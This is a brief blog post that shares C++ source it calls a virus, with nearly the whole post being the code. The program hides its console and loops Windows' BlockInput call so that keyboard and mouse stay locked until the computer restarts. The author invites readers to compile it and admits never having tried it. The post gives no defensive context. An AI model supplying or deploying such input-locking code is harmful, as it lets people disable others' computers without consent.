All of us heard about viruses but some of us don`t know how are created.
I know a little C++ and I documented myself on internet and I found the next code. If you’ll compile this source code in Mingw or in another C++ compiler it will result a virus/ aplication who will block your input devices. Your devices will start only after you restart the computer. So this is the code but I must tell you that I didn’t try it…
#include<windows.h>
#include <winable.h>
using namespace std;
int main()
{
FreeConsole();
while(1)
{
BlockInput(true);
}
return 0;
}
0 comments:
Post a Comment